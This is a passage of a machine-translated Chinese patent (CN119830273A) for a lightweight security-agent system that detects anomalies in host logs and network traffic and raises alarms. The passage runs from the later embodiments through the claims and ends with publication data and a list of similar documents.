S2, the operation and maintenance management platform processes actual functions of the operation and maintenance of the host, including specific operations such as host login, file uploading, execution of automatic operation and maintenance scripts and the like. The interaction platform only sends a request, and in order to meet various access requests, specific business logic is not suitable to be involved, and authentication and authorization verification of the identity are realized through the operation and maintenance management platform. Besides collecting the collected data returned by the agent, the flow mirror images are forwarded to a log monitoring platform so as to carry out more comprehensive detection and analysis. The operation and maintenance management platform performs inspection and check on the configuration script to be executed, and the security of configuration operation is improved.
And S3, the log monitoring analysis platform collects data from each security agent in a bypass monitoring mode to perform comprehensive security analysis, event detection and response. Recording the acquired data of the host computer in a log mode, converting the log into a chart by using python when the acquired data is required to be displayed, and sending the chart to the interaction platform. Only text information is stored at the rear end, so that file storage pressure is reduced. When detecting that a high-risk event exists, the system also sends information to the interaction platform and automatically pushes the information to an administrator mailbox and a short message platform.
Illustratively, FIG. 5 is a schematic diagram of yet another alternative event detection method according to an embodiment of the present application, as shown in FIG. 5, including four functions of automated operation and maintenance management, security policy management, event detection and response, and log management.
S1, automatic operation and maintenance management, namely collecting a command set by an interaction platform, applying the command set to an operation and maintenance management platform, distributing the command to a corresponding lightweight security agent and executing a user uploading instruction. And executing batch scripts, namely pushing the compiled shell and other operation and maintenance scripts to a host computer to be executed through a lightweight security agent, and executing the scripts in batch to realize automatic operation and maintenance.
And S2, automatic configuration deployment, namely dividing the managed hosts into the genus groups according to the host types, uniformly carrying out configuration management on the hosts of the same type, and if the hosts need to be changed, firstly checking the configuration to confirm the validity. The deployment script commands are initially checked by matching common commands with regular expressions. By continuously perfecting the regular expression database and adding description labels to the expression, embedding abstracts the regular expression by using an encoder, and then uses the encoder to establish mapping with the labels. The commands with similar semantics are clustered by contrast learning so as to obtain better abstract results. When the model converges, a meta-expression generating the check command is obtained to adapt to more variable configuration information. And after the configuration command passes the code inspection, the configuration command is sent to the lightweight security agent to realize batch consistency change.
Further, for specific execution of the script and the automatic configuration, firstly, a user needs to create an operation script, after the script is written, the script can be applied for release, the expected use time is long or short (for example, 1 month), the configuration is written by means of yaml, and the template program is used for reading yaml to directly generate the configuration execution code. The release process includes a local audit and a process audit. The local audit is manually judged by high-authority operation and maintenance personnel and is used for rapid passing under emergency conditions. The process auditing comprises machine auditing and manual auditing, firstly, the regular expression and the machine learning checking command are used for carrying out preliminary analysis on the script, judging whether the command is legal or not, whether high-risk operation exists or not, then, the script can be executed after the auditing is passed by a superior lead according to the initially set personnel auditing process. And when the script is stopped, the script can be applied to be offline.
And S3, safety strategy management, namely collecting configuration information by the interaction platform, sending the configuration information to the operation and maintenance management platform for unified configuration, and pushing the configuration information to the lightweight safety agent for configuration completion. Policy definition-allowing an administrator to define and configure security policies including access control, data protection, network quarantine, etc. Policy application-security policies are automatically applied to all protected devices and systems, ensuring consistency and validity.
And S4, event detection and response, namely finishing data collection by the lightweight security agent, sending the data to the operation and maintenance management platform at regular time, and analyzing and detecting the flow after the log monitoring and analyzing platform acquires the data. Anomaly detection, namely detecting abnormal activities by analyzing system logs, network traffic and behavior patterns. Behavioral analysis is performed using machine learning algorithms to identify potential security threats. For log analysis, this is mainly done by means of outlier detection. Because the collected host is mainly a sequential time sequence number, a threshold range can be generated for the expected log result according to lstm, and regression analysis can be carried out on the data. Alerting is performed when the collected data deviates significantly from the threshold. For the log of command execution, a keyword dictionary is built to detect and alert special keywords. For network traffic, the method mainly comprises the steps of analyzing the traffic in a decision tree mode, firstly decomposing the characteristic value of the traffic, then combining the traffic in a plurality of decision trees, dynamically calculating the weight of each decision tree, clustering similar traffic, and analyzing whether abnormal traffic exists in the traffic. The pcap package can also be converted into an image to analyze and cluster the content of the load so as to judge whether unreasonable traffic exists.
And S5, automatically responding, namely configuring an automatic response mechanism, and automatically pushing alarm information, including alarm content and a positioned file path or process path, to the interactive platform by the log monitoring and analyzing platform when the security event is detected. The alarm information is displayed in the display interface in the form of notification, and mail and short messages are sent to the host operation and maintenance personnel and the system administrator. The alarm information is synchronously sent to an operation and maintenance management platform, and the operation and maintenance management platform adopts different processing flows aiming at file alarms and process alarms. For file alarming, the operation and maintenance management platform pushes instructions to the agent, inquires environment information such as running processes, CPU memory and the like in the system, records the environment information into a log file under an alarming record directory, and facilitates later event analysis and positioning. If the alarm information is dangerous progress, the basic information of the current host is recorded, and the alarm is automatically processed by using a keyword matching mode. If the corresponding historical alarm information cannot be matched, the operation and maintenance management platform can set the nginx forwarding weight of the dangerous host to 0 through the agent, so that risks on the dangerous host are prevented from being diffused to other hosts. And then, the operation and maintenance personnel manually process the operation and maintenance operation, and input the flow into an operation manual. Each time a new process alarm is processed, an operation manual is input to form a processing script, the operation of forwarding off-line to a host computer is avoided as much as possible, and the influence on other processes on the host computer is reduced
S6, log management, namely classifying and sorting all processed information by the log monitoring and analyzing platform and displaying the processed information on the interaction platform. Log collection and analysis the logs from the various devices are collected and analyzed centrally to generate detailed security reports and trend analysis. The security management method comprises the steps of logging in the frequency of the host, displaying the security of the host in a data mode and facilitating better management of the host. Visualization of the data text is achieved through python and a visualization library. Log storage and archiving, namely providing a safe log storage and archiving mechanism and supporting long-term storage and query of the log. The operation information of the host computer is recorded and stored, so that the operation is required to be examined and timing before the operation in the future, specific operation steps are traced back through log archiving, the scene of the occurrence problem is restored, and the problem is solved more quickly.
In general, the embodiment of the application realizes high-efficiency data processing, adopts high-efficiency data processing and storage technology, and uses an internal memory database and distributed computation to improve the response speed and processing capacity of the system. And data encryption, namely encrypting the transmitted and stored data to ensure confidentiality and integrity of the data. And designing a lightweight security agent and a management platform, optimizing resource use, and ensuring that the system can normally operate in a low-resource environment. And in consideration of load balancing, the bottleneck of the system is mainly in the operation and maintenance management platform, the load of the operation and maintenance management platform is reduced by isolating the display platform from the operation and maintenance management platform, and meanwhile, a plurality of hosts are configured to form the operation and maintenance management platform together, so that the efficient and stable operation of the system is ensured.
In addition, the abnormal flow is determined to exist in the flow data according to a combination of the machine learning model and the abnormal value detection. And meanwhile, keyword matching is carried out on the log files, an alarm dictionary is designed, such as keywords of error, failed and the like, a simple and visual user interface is provided, configuration, monitoring and report checking are facilitated for an administrator, and the administrator is helped to quickly understand the security situation and the operation and maintenance state through the visualization functions of charts, dashboards and the like.
The embodiment of the application uses a lightweight security agent and an optimized data processing mechanism, thereby greatly reducing the occupation of system resources, reducing hardware investment and operation and maintenance cost, integrating the functions of event detection and response, vulnerability management, security policy management, log management and the like, meeting the comprehensive requirements of a modern information system on security and operation and maintenance management, focusing on simplifying the deployment and maintenance process, and realizing comprehensive security protection by only carrying out a small amount of configuration by an administrator. By using an automatic response mechanism and efficient data processing capability, the system can rapidly cope with security threats and reduce potential security risks.
It will be appreciated that in the specific embodiments of the present application, related data such as user information is involved, and when the above embodiments of the present application are applied to specific products or technologies, user permissions or consents need to be obtained, and the collection, use and processing of related data need to comply with related laws and regulations and standards of related countries and regions.
It should be noted that, for simplicity of description, the foregoing method embodiments are all described as a series of acts, but it should be understood by those skilled in the art that the present application is not limited by the order of acts described, as some steps may be performed in other orders or concurrently in accordance with the present application. Further, those skilled in the art will also appreciate that the embodiments described in the specification are all preferred embodiments, and that the acts and modules referred to are not necessarily required for the present application.
According to another aspect of the embodiment of the present application, there is also provided an event detection apparatus for implementing the event detection method described above. As shown in fig. 6, the apparatus includes:
a deployment module 602, configured to deploy a lightweight security proxy service on a terminal device;
the acquisition module 604 is used for acquiring the operation data of the terminal equipment through the lightweight security proxy service;
An execution module 606, configured to perform an outlier detection operation on system log data in the operation data, determine a first detection result, and perform a decision tree detection operation on network traffic data in the operation data, determine a second detection result;
A determining module 608, configured to determine whether a target event occurs in the terminal device based on the first detection result and the second detection result;
A generating module 610, configured to generate an alarm message according to the target event in the presence of the target event, where the alarm message includes at least one of a file path and a process path that cause the target event to occur, where the file path and the process path are used to locate a source and an influence range of the target event.
The device is used for executing abnormal value detection operation on system log data in operation data, determining a first detection result, processing the system log data according to a long-short-term memory network model to obtain a target threshold range, carrying out regression analysis on the system log data based on the target threshold range, determining the first detection result, and/or detecting the system log data according to a predetermined keyword dictionary, wherein the first detection result is used for indicating whether the system log data is abnormal or not.
The device is used for determining a second detection result by performing characteristic value decomposition operation on network traffic data to obtain a target characteristic vector related to traffic behaviors, processing the target characteristic vector by using a pre-trained decision tree model to obtain similar network traffic data, clustering the similar network traffic data to obtain a second detection result, wherein the second detection result is used for indicating whether abnormal traffic exists in the network traffic data, and converting the network capture data packet into image data under the condition that the network traffic data comprises the network capture data packet, and performing cluster analysis on the image data to obtain the second detection result.
As an alternative scheme, the device is used for determining whether the terminal equipment generates the target event or not based on the first detection result and the second detection result, and comprises at least one of determining that the terminal equipment generates the target event when the first detection result indicates whether the system log data has an abnormal log or not, and determining that the terminal equipment generates the target event when the second detection result indicates that the network traffic data has abnormal traffic.
As an alternative scheme, the device is used for generating the alarm message according to the target event in the condition that the target event exists, determining at least one of a file path and a process path related to the target event in the condition that the target event exists, determining the event type of the target event based on the file path and/or the process path, and generating the alarm message according to the event type.
The device is also used for controlling the operation and maintenance management platform to send a monitoring instruction to the terminal equipment through the lightweight security proxy service under the condition that the event type is the file alarm type so as to acquire the system environment information of the terminal equipment and store the system environment information into a log file under an alarm record directory, wherein the system environment information comprises the process information of the terminal equipment currently running.
The device is also used for storing system environment information into a log file and calling a target processing script to process a target event when the event type is a process alarm type and the same history alarm type is acquired, wherein the target processing script is used for executing a preset repairing operation to repair a system error caused by the target event, and setting the forwarding weight of a reverse proxy server of the terminal device to 0 through a lightweight security proxy service when the event type is the process alarm type and the same history alarm type is not acquired.
In the present embodiment, the term "module" or "unit" refers to a computer program or a part of a computer program having a predetermined function and working together with other relevant parts to achieve a predetermined object, and may be implemented in whole or in part by using software, hardware (such as a processing circuit or a memory), or a combination thereof. Also, a processor (or multiple processors or memories) may be used to implement one or more modules or units. Furthermore, each module or unit may be part of an overall module or unit that incorporates the functionality of the module or unit.
The specific manner in which the various modules perform the operations in the apparatus of the above embodiments have been described in detail in connection with the embodiments of the method, and will not be described in detail herein.
According to one aspect of the present application, a computer program product is provided, the computer program product comprising a computer program.
The foregoing embodiment numbers of the present application are merely for the purpose of description, and do not represent the advantages or disadvantages of the embodiments.
Fig. 7 schematically shows a block diagram of a computer system of an electronic device for implementing an embodiment of the application.
It should be noted that, the computer system 700 of the electronic device shown in fig. 7 is only an example, and should not impose any limitation on the functions and the application scope of the embodiments of the present application.
As shown in fig. 7, the computer system 700 includes a central processing unit 701 (Central Processing Unit, CPU) which can perform various appropriate actions and processes according to a program stored in a Read-Only Memory 702 (ROM) or a program loaded from a storage section 708 into a random access Memory 703 (Random Access Memory, RAM). In the random access memory 703, various programs and data necessary for the system operation are also stored. The central processing unit 701, the read only memory 702, and the random access memory 703 are connected to each other via a bus 704. An Input/Output interface 705 (i.e., an I/O interface) is also connected to bus 704.
Connected to the input/output interface 705 are an input section 706 including a keyboard, a mouse, and the like, an output section 707 including a Cathode Ray Tube (CRT), a Liquid crystal display (Liquid CRYSTAL DISPLAY, LCD), and the like, and a speaker, and the like, a storage section 708 including a hard disk, and the like, and a communication section 709 including a network interface card such as a local area network card, a modem, and the like. The communication section 709 performs communication processing via a network such as the internet. The drive 710 is also connected to the input/output interface 705 as needed. A removable medium 711 such as a magnetic disk, an optical disk, a magneto-optical disk, a semiconductor memory, or the like is mounted on the drive 710 as necessary, so that a computer program read therefrom is mounted into the storage section 708 as necessary.
In particular, the processes described in the various method flowcharts may be implemented as computer software programs according to embodiments of the application. For example, embodiments of the present application include a computer program product comprising a computer program embodied on a computer readable medium, the computer program comprising program code for performing the method shown in the flowcharts. In such an embodiment, the computer program may be downloaded and installed from a network via the communication portion 709, and/or installed from the removable medium 711. The computer programs, when executed by the central processor 701, perform the various functions defined in the system of the present application.
In such an embodiment, the computer program may be downloaded and installed from a network via the communication portion 709, and/or installed from the removable medium 711. When executed by the central processor 701, performs the various functions provided by embodiments of the present application.
According to still another aspect of the embodiment of the present application, there is also provided an electronic device for implementing the event detection method described above, where the electronic device may be a terminal device or a server as shown in fig. 1. The present embodiment is described taking the electronic device as a terminal device as an example. As shown in fig. 8, the electronic device comprises a memory 802 and a processor 804, the memory 802 having stored therein a computer program, the processor 804 being arranged to perform the steps of any of the method embodiments described above by means of the computer program.
Alternatively, in this embodiment, the electronic device may be located in at least one network device of a plurality of network devices of the computer network.
Alternatively, in the present embodiment, the above-described processor may be configured to execute the method in the embodiments of the present application by a computer program.
Alternatively, it will be appreciated by those of ordinary skill in the art that the configuration shown in fig. 8 is merely illustrative, and that fig. 8 is not intended to limit the configuration of the electronic device described above. For example, the electronic device may also include more or fewer components (e.g., network interfaces, etc.) than shown in FIG. 8, or have a different configuration than shown in FIG. 8.
The memory 802 may be used to store software programs and modules, such as program instructions/modules corresponding to the event detection methods and apparatuses in the embodiments of the present application, and the processor 804 executes the software programs and modules stored in the memory 802, thereby performing various functional applications and data processing, that is, implementing the event detection methods described above. Memory 802 may include high-speed random access memory, and may also include non-volatile memory, such as one or more magnetic storage devices, flash memory, or other non-volatile solid-state memory. In some examples, memory 802 may further include memory remotely located relative to processor 804, which may be connected to the terminal via a network. Examples of such networks include, but are not limited to, the internet, intranets, local area networks, mobile communication networks, and combinations thereof. The memory 802 may be used to store, but is not limited to, information such as operation data. As an example, as shown in fig. 8, the memory 802 may include, but is not limited to, the deployment module 602, the acquisition module 604, the execution module 606, and the determination module 608 in the event detection device. In addition, other module units in the event detection apparatus may be included, but are not limited to, and are not described in detail in this example.
Optionally, the transmission device 806 is used to receive or transmit data via a network. Specific examples of the network described above may include wired networks and wireless networks. In one example, the transmission means 806 includes a network adapter (Network Interface Controller, NIC) that can connect to other network devices and routers via a network cable to communicate with the internet or a local area network. In one example, the transmission device 806 is a Radio Frequency (RF) module for communicating wirelessly with the internet.
The electronic device further comprises a display 808 for displaying the alarm message and a connection bus 810 for connecting the individual module components of the electronic device.
In other embodiments, the terminal device or the server may be a node in a distributed system, where the distributed system may be a blockchain system, and the blockchain system may be a distributed system formed by connecting the plurality of nodes through a network communication. The nodes may form a peer-to-peer network, and any type of computing device, such as a server, a terminal, etc., may become a node in the blockchain system by joining the peer-to-peer network.
According to one aspect of the present application, there is provided a computer-readable storage medium, from which a processor of an electronic device reads the computer instructions, the processor executing the computer instructions, causing the electronic device to perform the event detection method provided in various alternative implementations of the event detection aspect described above.
Alternatively, in the present embodiment, the above-described computer-readable storage medium may be configured to store a program for executing the method in the embodiments of the present application.
Alternatively, in this embodiment, all or part of the steps in the various methods of the above embodiments may be implemented by a program for instructing the terminal device related hardware, and the program may be stored in a computer readable storage medium, where the storage medium may include a flash disk, a Read-Only Memory (ROM), a random access Memory (Random Access Memory, RAM), a magnetic disk, or an optical disk.
The foregoing embodiment numbers of the present application are merely for the purpose of description, and do not represent the advantages or disadvantages of the embodiments.
The integrated units in the above embodiments may be stored in the above-described computer-readable storage medium if implemented in the form of software functional units and sold or used as separate products. Based on such understanding, the technical solution of the present application may be embodied essentially or partly in the form of a software product or all or part of the technical solution, which is stored in a storage medium, comprising several instructions for causing one or more electronic devices to perform all or part of the steps of the method described in the various embodiments of the present application.
In the foregoing embodiments of the present application, the descriptions of the embodiments are emphasized, and for a portion of this disclosure that is not described in detail in this embodiment, reference is made to the related descriptions of other embodiments.
In the several embodiments provided in the present application, it should be understood that the disclosed application program may be implemented in other manners. The above-described embodiments of the apparatus are merely exemplary, and the division of the units, such as the division of the units, is merely a logical function division, and may be implemented in another manner, for example, multiple units or components may be combined or may be integrated into another system, or some features may be omitted, or not performed. Alternatively, the coupling or direct coupling or communication connection shown or discussed with each other may be through some interfaces, units or modules, or may be in electrical or other forms.
The units described as separate units may or may not be physically separate, and units shown as units may or may not be physical units, may be located in one place, or may be distributed on a plurality of network units. Some or all of the units may be selected according to actual needs to achieve the purpose of the solution of this embodiment.
In addition, each functional unit in the embodiments of the present application may be integrated in one processing unit, or each unit may exist alone physically, or two or more units may be integrated in one unit. The integrated units may be implemented in hardware or in software functional units.
The foregoing is merely a preferred embodiment of the present application and it should be noted that modifications and adaptations to those skilled in the art may be made without departing from the principles of the present application, which are intended to be comprehended within the scope of the present application.
Claims (11)
1. An event detection method, comprising:
Deploying lightweight security proxy service on the terminal equipment;
Collecting operation data of the terminal equipment through the lightweight security proxy service;
performing abnormal value detection operation on system log data in the operation data, determining a first detection result, performing decision tree detection operation on network flow data in the operation data, and determining a second detection result;
Determining whether a target event occurs to the terminal equipment based on the first detection result and the second detection result;
And generating an alarm message according to the target event in the presence of the target event, wherein the alarm message comprises at least one of a file path and a process path which cause the target event to occur, and the file path and the process path are used for locating the source and the influence range of the target event.
2. The method of claim 1, wherein performing an outlier detection operation on system log data in the operational data, determining a first detection result comprises:
Processing the system log data according to a long-term and short-term memory network model to obtain a target threshold range;
And carrying out regression analysis on the system log data based on the target threshold range, determining the first detection result, and/or detecting the system log data according to a predetermined keyword dictionary, and determining the first detection result, wherein the first detection result is used for indicating whether the system log data has abnormality or not.
3. The method of claim 1, wherein the performing a decision tree detection operation on network traffic data in the operational data, determining a second detection result, comprises:
Performing eigenvalue decomposition operation on the network flow data to obtain a target eigenvector related to flow behavior;
Processing the target feature vector by using a pre-trained decision tree model to obtain similar network flow data;
Clustering the similar network traffic data to obtain the second detection result, wherein the second detection result is used for indicating whether abnormal traffic exists in the network traffic data;
And under the condition that the network traffic data comprises a network capturing data packet, converting the network capturing data packet into image data, and performing cluster analysis on the image data to obtain the second detection result.
4. A method according to any of claims 1 to 3, wherein said determining whether a target event has occurred at the terminal device based on the first detection result and the second detection result comprises at least one of:
Determining that the terminal equipment has the target event under the condition that the first detection result indicates whether the system log data has an abnormal log or not;
and under the condition that the second detection result indicates that abnormal traffic exists in the network traffic data, determining that the terminal equipment generates the target event.
5. The method of claim 1, wherein generating an alert message from the target event in the presence of the target event comprises:
Determining at least one of the file path and the process path related to the target event in the presence of the target event;
determining an event type of the target event based on the file path and/or the process path;
and generating the alarm message according to the event type.
6. The method of claim 5, wherein the method further comprises:
And under the condition that the event type is a file alarm type, controlling an operation and maintenance management platform to send a monitoring instruction to the terminal equipment through the lightweight security proxy service so as to acquire system environment information of the terminal equipment, and storing the system environment information into a log file under an alarm record directory, wherein the system environment information comprises process information of the terminal equipment currently running.
7. The method of claim 5, wherein the method further comprises:
Storing the system environment information into the log file and calling a target processing script to process the target event under the condition that the event type is a process alarm type and the same historical alarm type is obtained, wherein the target processing script is used for executing a preset repairing operation so as to repair a system error caused by the target event;
And setting the reverse proxy server forwarding weight of the terminal equipment to 0 through the lightweight security proxy service in the case that the event type is the process alarm type and the same history alarm type is not acquired.
8. An event detection system, comprising:
the lightweight security agent module is used for collecting the operation data of the terminal equipment and executing the instruction sent by the operation and maintenance management platform;
The operation and maintenance management platform module is used for managing the access authority of the user and processing command distribution and flow mirroring;
the log monitoring analysis platform module is used for executing abnormal value detection operation on the system log data in the operation data, determining a first detection result, executing decision tree detection operation on the network flow data in the operation data and determining a second detection result;
the automatic operation and maintenance module performs batch script execution and automatic configuration deployment on the terminal equipment according to the system operation instruction and the configuration script;
And generating an alarm message according to the target event in the presence of the target event, wherein the alarm message comprises at least one file path and at least one process path which cause the occurrence of the target event, and the file path and the process path are used for positioning the source and the influence range of the target event.
9. A computer-readable storage medium, characterized in that the computer-readable storage medium comprises a stored computer program, wherein the computer program is executable by an electronic device to perform the method of any one of claims 1 to 7.
10. A computer program product comprising a computer program, characterized in that the computer program, when being executed by a processor, realizes the steps of the method according to any one of claims 1 to 7.
11. An electronic device comprising a memory and a processor, characterized in that the memory has stored therein a computer program, the processor being arranged to execute the method according to any of the claims 1 to 7 by means of the computer program.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202411843210.7A CN119830273A (en) | 2024-12-13 | 2024-12-13 | Event detection method and device, storage medium and electronic equipment |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202411843210.7A CN119830273A (en) | 2024-12-13 | 2024-12-13 | Event detection method and device, storage medium and electronic equipment |
Publications (1)
| Publication Number | Publication Date |
|---|---|
| CN119830273A true CN119830273A (en) | 2025-04-15 |
Family
ID=95300325
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN202411843210.7A Pending CN119830273A (en) | 2024-12-13 | 2024-12-13 | Event detection method and device, storage medium and electronic equipment |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN119830273A (en) |
-
2024
- 2024-12-13 CN CN202411843210.7A patent/CN119830273A/en active Pending
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| US11729193B2 (en) | Intrusion detection system enrichment based on system lifecycle | |
| WO2023216641A1 (en) | Security protection method and system for power terminal | |
| US9336385B1 (en) | System for real-time threat detection and management | |
| CN113228587A (en) | System and method for cloud-based control plane event monitoring | |
| US10671723B2 (en) | Intrusion detection system enrichment based on system lifecycle | |
| KR20190090037A (en) | Systems and methods for cloud-based operating system event and data access monitoring | |
| CN112766672A (en) | Network security guarantee method and system based on comprehensive evaluation | |
| CN116760636A (en) | An active defense system and method for unknown threats | |
| US20230231882A1 (en) | Honeypot identification method, apparatus, device, and medium based on cyberspace mapping | |
| SE524963C2 (en) | Node and mobile device for a mobile telecommunications network providing intrusion detection | |
| Lindqvist et al. | eXpert-BSM: A host-based intrusion detection solution for Sun Solaris | |
| CN103124293A (en) | Cloud data safe auditing method based on multi-Agent | |
| US20180146002A1 (en) | Cyber Security System and Method Using Intelligent Agents | |
| US12248582B2 (en) | Intelligent apparatus to monitor and auto deploy security policy rules on container based cloud infrastructure leveraging NFT and quantum knowledge graph | |
| US20220027456A1 (en) | Rasp-based implementation using a security manager | |
| KR102160950B1 (en) | Data Distribution System and Its Method for Security Vulnerability Inspection | |
| US20140259171A1 (en) | Tunable intrusion prevention with forensic analysis | |
| CN116662112A (en) | Digital monitoring platform using full-automatic scanning and system state evaluation | |
| JP2018169643A (en) | Security operation system, security operation management apparatus, and security operation method | |
| KR101201629B1 (en) | Cloud computing system and Method for Security Management for each Tenant in Multi-tenancy Environment | |
| US10110440B2 (en) | Detecting network conditions based on derivatives of event trending | |
| US20250363195A1 (en) | Dynamic transaction-aware web application authentication using call intercepts | |
| CN110365714A (en) | Host intrusion detection method, device, device and computer storage medium | |
| CN116996238A (en) | Processing method and related device for network abnormal access | |
| CN107682166B (en) | Implementation method for remote data acquisition of safety operation and maintenance service platform based on big data |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination |